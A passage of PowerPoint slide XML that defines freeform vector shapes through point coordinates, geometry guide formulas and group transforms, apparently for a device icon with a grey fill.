                      <a:pt x="289" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="368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367" name="Group 366"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2838209" y="2174742"/>
            <a:ext cx="1753015" cy="1713341"/>
            <a:chOff x="2835034" y="2171567"/>
            <a:chExt cx="1753015" cy="1713341"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="368" name="Freeform 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2835034" y="2416927"/>
              <a:ext cx="1753015" cy="1467981"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 4688 w 7403"/>
                <a:gd name="T1" fmla="*/ 2237 h 6201"/>
                <a:gd name="T2" fmla="*/ 4709 w 7403"/>
                <a:gd name="T3" fmla="*/ 2200 h 6201"/>
                <a:gd name="T4" fmla="*/ 4673 w 7403"/>
                <a:gd name="T5" fmla="*/ 2163 h 6201"/>
                <a:gd name="T6" fmla="*/ 4289 w 7403"/>
                <a:gd name="T7" fmla="*/ 2174 h 6201"/>
                <a:gd name="T8" fmla="*/ 4284 w 7403"/>
                <a:gd name="T9" fmla="*/ 2216 h 6201"/>
                <a:gd name="T10" fmla="*/ 4494 w 7403"/>
                <a:gd name="T11" fmla="*/ 4274 h 6201"/>
                <a:gd name="T12" fmla="*/ 4394 w 7403"/>
                <a:gd name="T13" fmla="*/ 4305 h 6201"/>
                <a:gd name="T14" fmla="*/ 4332 w 7403"/>
                <a:gd name="T15" fmla="*/ 4384 h 6201"/>
                <a:gd name="T16" fmla="*/ 4321 w 7403"/>
                <a:gd name="T17" fmla="*/ 4489 h 6201"/>
                <a:gd name="T18" fmla="*/ 4368 w 7403"/>
                <a:gd name="T19" fmla="*/ 4578 h 6201"/>
                <a:gd name="T20" fmla="*/ 4494 w 7403"/>
                <a:gd name="T21" fmla="*/ 4631 h 6201"/>
                <a:gd name="T22" fmla="*/ 4594 w 7403"/>
                <a:gd name="T23" fmla="*/ 4599 h 6201"/>
                <a:gd name="T24" fmla="*/ 4662 w 7403"/>
                <a:gd name="T25" fmla="*/ 4520 h 6201"/>
                <a:gd name="T26" fmla="*/ 4673 w 7403"/>
                <a:gd name="T27" fmla="*/ 4416 h 6201"/>
                <a:gd name="T28" fmla="*/ 4620 w 7403"/>
                <a:gd name="T29" fmla="*/ 4326 h 6201"/>
                <a:gd name="T30" fmla="*/ 4494 w 7403"/>
                <a:gd name="T31" fmla="*/ 4274 h 6201"/>
                <a:gd name="T32" fmla="*/ 3895 w 7403"/>
                <a:gd name="T33" fmla="*/ 2457 h 6201"/>
                <a:gd name="T34" fmla="*/ 3854 w 7403"/>
                <a:gd name="T35" fmla="*/ 2525 h 6201"/>
                <a:gd name="T36" fmla="*/ 3874 w 7403"/>
                <a:gd name="T37" fmla="*/ 4142 h 6201"/>
                <a:gd name="T38" fmla="*/ 5066 w 7403"/>
                <a:gd name="T39" fmla="*/ 4163 h 6201"/>
                <a:gd name="T40" fmla="*/ 5119 w 7403"/>
                <a:gd name="T41" fmla="*/ 4142 h 6201"/>
                <a:gd name="T42" fmla="*/ 5140 w 7403"/>
                <a:gd name="T43" fmla="*/ 2525 h 6201"/>
                <a:gd name="T44" fmla="*/ 5093 w 7403"/>
                <a:gd name="T45" fmla="*/ 2457 h 6201"/>
                <a:gd name="T46" fmla="*/ 0 w 7403"/>
                <a:gd name="T47" fmla="*/ 6200 h 6201"/>
                <a:gd name="T48" fmla="*/ 5240 w 7403"/>
                <a:gd name="T49" fmla="*/ 5985 h 6201"/>
                <a:gd name="T50" fmla="*/ 5350 w 7403"/>
                <a:gd name="T51" fmla="*/ 5571 h 6201"/>
                <a:gd name="T52" fmla="*/ 5528 w 7403"/>
                <a:gd name="T53" fmla="*/ 5192 h 6201"/>
                <a:gd name="T54" fmla="*/ 5765 w 7403"/>
                <a:gd name="T55" fmla="*/ 4857 h 6201"/>
                <a:gd name="T56" fmla="*/ 6059 w 7403"/>
                <a:gd name="T57" fmla="*/ 4563 h 6201"/>
                <a:gd name="T58" fmla="*/ 6394 w 7403"/>
                <a:gd name="T59" fmla="*/ 4326 h 6201"/>
                <a:gd name="T60" fmla="*/ 6773 w 7403"/>
                <a:gd name="T61" fmla="*/ 4148 h 6201"/>
                <a:gd name="T62" fmla="*/ 7187 w 7403"/>
                <a:gd name="T63" fmla="*/ 4038 h 6201"/>
                <a:gd name="T64" fmla="*/ 7402 w 7403"/>
                <a:gd name="T65" fmla="*/ 0 h 6201"/>
                <a:gd name="T66" fmla="*/ 6316 w 7403"/>
                <a:gd name="T67" fmla="*/ 127 h 6201"/>
                <a:gd name="T68" fmla="*/ 5292 w 7403"/>
                <a:gd name="T69" fmla="*/ 425 h 6201"/>
                <a:gd name="T70" fmla="*/ 4352 w 7403"/>
                <a:gd name="T71" fmla="*/ 882 h 6201"/>
                <a:gd name="T72" fmla="*/ 3502 w 7403"/>
                <a:gd name="T73" fmla="*/ 1486 h 6201"/>
                <a:gd name="T74" fmla="*/ 2762 w 7403"/>
                <a:gd name="T75" fmla="*/ 2211 h 6201"/>
                <a:gd name="T76" fmla="*/ 2147 w 7403"/>
                <a:gd name="T77" fmla="*/ 3050 h 6201"/>
                <a:gd name="T78" fmla="*/ 1670 w 7403"/>
                <a:gd name="T79" fmla="*/ 3985 h 6201"/>
                <a:gd name="T80" fmla="*/ 1355 w 7403"/>
                <a:gd name="T81" fmla="*/ 4998 h 6201"/>
                <a:gd name="T82" fmla="*/ 200 w 7403"/>
                <a:gd name="T83" fmla="*/ 6001 h 6201"/>
                <a:gd name="T84" fmla="*/ 5334 w 7403"/>
                <a:gd name="T85" fmla="*/ 4563 h 6201"/>
                <a:gd name="T86" fmla="*/ 5224 w 7403"/>
                <a:gd name="T87" fmla="*/ 4689 h 6201"/>
                <a:gd name="T88" fmla="*/ 3927 w 7403"/>
                <a:gd name="T89" fmla="*/ 4736 h 6201"/>
                <a:gd name="T90" fmla="*/ 3770 w 7403"/>
                <a:gd name="T91" fmla="*/ 4689 h 6201"/>
                <a:gd name="T92" fmla="*/ 3659 w 7403"/>
                <a:gd name="T93" fmla="*/ 4563 h 6201"/>
                <a:gd name="T94" fmla="*/ 3638 w 7403"/>
                <a:gd name="T95" fmla="*/ 2163 h 6201"/>
                <a:gd name="T96" fmla="*/ 3722 w 7403"/>
                <a:gd name="T97" fmla="*/ 1964 h 6201"/>
                <a:gd name="T98" fmla="*/ 3869 w 7403"/>
                <a:gd name="T99" fmla="*/ 1885 h 6201"/>
                <a:gd name="T100" fmla="*/ 5124 w 7403"/>
                <a:gd name="T101" fmla="*/ 1885 h 6201"/>
                <a:gd name="T102" fmla="*/ 5271 w 7403"/>
                <a:gd name="T103" fmla="*/ 1964 h 6201"/>
                <a:gd name="T104" fmla="*/ 5355 w 7403"/>
                <a:gd name="T105" fmla="*/ 2163 h 6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403" h="6201">
                  <a:moveTo>
                    <a:pt x="4315" y="2237"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4673" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4688" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4704" y="2226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4709" y="2216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4709" y="2200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4709" y="2200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4709" y="2184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4704" y="2174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4688" y="2168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4300" y="2168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4289" y="2174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4284" y="2184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4279" y="2200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4279" y="2200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4284" y="2216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4289" y="2226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4300" y="2237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="2237"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4494" y="4274"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4494" y="4274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4457" y="4279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4426" y="4284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4394" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4368" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4368" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4347" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4332" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4321" y="4416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4315" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4321" y="4489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4332" y="4520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4347" y="4552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4368" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4368" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4394" y="4599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4426" y="4615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4457" y="4626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4494" y="4631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4494" y="4631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4531" y="4626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4562" y="4615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4594" y="4599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4620" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4620" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4646" y="4552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="4520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="4489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4673" y="4416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4646" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4620" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4620" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4594" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4562" y="4284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4531" y="4279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4494" y="4274"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5066" y="2452"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3927" y="2452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="2452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="2457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="2473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="2473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3859" y="2494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3854" y="2525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3854" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3854" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3859" y="4122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3895" y="4158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5093" y="4158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5119" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5119" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5134" y="4122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5140" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5140" y="2525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5140" y="2525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5134" y="2494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5119" y="2473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5119" y="2473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5093" y="2457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="2452"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1355" y="4998"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5208" y="6200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5208" y="6200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5224" y="6090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5240" y="5985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5261" y="5880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5281" y="5775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5313" y="5675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5350" y="5571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5387" y="5476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5428" y="5381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5476" y="5287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5528" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5581" y="5104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5638" y="5019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5701" y="4935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5765" y="4857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5833" y="4778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5906" y="4704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5980" y="4631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6059" y="4563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6137" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6221" y="4436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6306" y="4379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6394" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6489" y="4274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6583" y="4226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6678" y="4185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6773" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6877" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7082" y="4059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7187" y="4038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7292" y="4022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7402" y="4006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7402" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7402" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7124" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6851" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6583" y="79"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6316" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6053" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5796" y="257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5544" y="336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5292" y="425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5050" y="525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4809" y="635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578" y="756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4352" y="882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4127" y="1019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="1166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3701" y="1323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3502" y="1486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="1654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="1833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2935" y="2016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2762" y="2211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2594" y="2410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2436" y="2620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2289" y="2830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147" y="3050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2011" y="3277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890" y="3507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1774" y="3744"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1670" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1575" y="4232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1491" y="4484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1417" y="4741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355" y="4998"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="200" y="6001"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="200" y="5198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903" y="5602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="6001"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5355" y="4452"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5355" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5350" y="4510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5334" y="4563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5308" y="4610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5271" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5271" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5224" y="4689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5177" y="4715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5124" y="4730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="4736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="4736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="4736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="4730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3817" y="4715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3770" y="4689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3685" y="4610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3659" y="4563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3644" y="4510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="4452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3644" y="2111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3659" y="2058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3685" y="2011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="1964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="1964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3770" y="1927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3817" y="1901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="1885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3927" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5066" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5124" y="1885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5177" y="1901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5224" y="1927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5271" y="1964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5271" y="1964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5308" y="2011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5334" y="2058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5350" y="2111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5355" y="2163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5355" y="445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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="369" name="Group 368"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2935265" y="2171567"/>
              <a:ext cx="1451277" cy="1213224"/>
              <a:chOff x="2455863" y="1114425"/>
              <a:chExt cx="2206625" cy="1844675"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="370" name="Freeform 18"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2455863" y="2816225"/>
                <a:ext cx="263525" cy="142875"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 731"/>
                  <a:gd name="T1" fmla="*/ 215 h 395"/>
